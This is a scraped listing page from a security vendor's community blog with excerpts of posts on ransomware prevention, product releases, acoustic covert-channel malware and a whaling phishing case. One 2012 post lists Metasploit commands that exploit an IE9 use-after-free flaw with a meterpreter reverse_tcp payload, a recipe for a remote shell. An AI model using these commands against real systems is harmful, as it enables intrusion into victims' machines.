Video Screencast Help
Security Community Blog
Showing posts tagged with Mail Security for Exchange/Domino
Showing posts in English
Brandon Noble | 20 Jan 2015 | 19 comments

Crypto-type malware is particularly nasty to deal with because it encrypts files.  While an infected file has had code added to it which antivirus can remove, an encrypted file isn’t repairable without the unique encryption key that was used. The criminals using crypto-type malware intend to sell you the unique key, giving you access to your files for a price. For this reason, crypto-type malware is also frequently called Ransomware. 

The key to dealing with crypto-type malware is prevention and planning.  While it is assumed you have antivirus and IPS protection in place, the criminals using crypto-malware are constantly updating code to avoid detection by these systems. Since the damage these threats do is often irreversible, taking additional steps to protect yourself is advised.

Preventive Measures

  • Do not follow unsolicited web links in email messages or submit any information to webpages in links.
  • Use caution...
Steve C Blair | 09 Jan 2015 | 0 comments

Good day all!

We're very pleased to share that the efforts over the Year End Break were highly successful and the January DCS 6.5 Beta is now available for you to download* and test by logging into your SymBeta account on and going to Builds.

We wanted to share with you a list of features confirmed in the Beta drop so you can start working on testing this release so if you'll take a look in the DCS 6.5 Beta discussion forum, you will find a lengthy list of features for testing and investigation.

The DCS 6.5 Team are pleased to announce that internal  testing has passed and our single ISO downloadable and installable image ready for you to start your testing. .


DCS 6.5 Beta Team

* If you are not a member of the DCS 6.5 Beta and would like to join us, there is still time for you to register on the...

captain jack sparrow | 03 Dec 2013 | 0 comments

can transmit information between computers using high-frequency sound waves inaudible to the human ear. The duo successfully sent passwords and more between non-networked Lenovo T400 laptops via the notebooks’ built-in microphones and speakers. Freaky-deaky!
The infected victim sends all recorded keystrokes to the covert acoustical mesh network. Infected drones forward the keystroke information inside the covert network till the attacker is reached.


kishorilal1986 | 17 Feb 2013 | 1 comment

Dear All,

As day by day security threat are increasing  and u need to more proactive approach to find latest details and make security tighten. As hackers group are continously working to break out security measures but at the same time organization spending lots of resource and money to make bussiness smooth and secure.

I think this is not just spending the money on IT security and having securty experts. makes u secure by implementing the security solutions. It is equally important to you how intellegently and smartly you take care each sides of security threats and configure it accordingly.

Please also read below threads for getting updates on some recent security threats

  • Shamoon virus targets energy sector infrastructure


pauldchavez | 03 Dec 2012 | 0 comments

Symantec would like to announce the general availability of Symantec Mail Security for Microsoft Exchange v7.0 (SMSMSE 7.0). Microsoft Exchange continues to be the leading application used for business communication across email and organizations must protect this environment from email-born threats and the loss of sensitive data. Symantec Mail Security for Microsoft Exchange v7.0 fully supports the latest Microsoft Exchange versions to maximize protection.

Summary of New Features:

• Support for Microsoft Exchange 2013 and Microsoft®Hosted Exchange environments

• Out-of-the-box content filtering templates for protection against data loss

• Improved anti-malware and anti-spam effectiveness through advanced heuristics

• Improved manageability with full message quarantine

• Up to 30 percent performance improvement for mailbox scanning

• Microsoft® Systems Center Operation Manager 2007 R2 support for...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could enforce this order, but what was actually happening is...

Matthew R. Ellison | 10 Oct 2012 | 0 comments

This blog continues from Part One.

Firstly we looked at how the email got through in the first place. The technique of an email coming from one place, but appearing to come from another is known as spoofing. Often in larger organisations it is quite normal to have third party applications or companies who legitimately spoof email – Marketing, HR, Cloud based application vendors and many more.

This is what had happened here, some issues with an external vendor had caused them to turn off the Content Control rule to allow spoofed email to be delivered. Of course what should have happened is for an exception to be created for that particular sender. It was only a temporary change during testing, but had never been fixed (I am not going to comment here on their testing processes).

That was easy...

Matthew R. Ellison | 10 Oct 2012 | 0 comments

Over the past couple of weeks we have been working very closely with a customer who was the victim of a phishing scam. Specifically it was a whale phishing (or whaling) technique, a type of spear phishing attack that is directly targeted at senior individuals within an organisation. (The opposite of Whale Phishing is Minnow Phishing or Minnowing where the attack is specifically directed at the apparently less significant members of a company such as receptionists or call centre workers – as seen in the recent Norton & Yahoo Cybergeddon movie)

Phishing is a fascinating area of security as it typically relies on our humanity (or you can read that as stupidity) to be successful. I see this with family members who quite happily delete emails from banks they don’t have accounts with, yet contact me to ask whether ‘this...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
Here's the Link to see the Archived Version: or go to our website at  to see all of the archived,...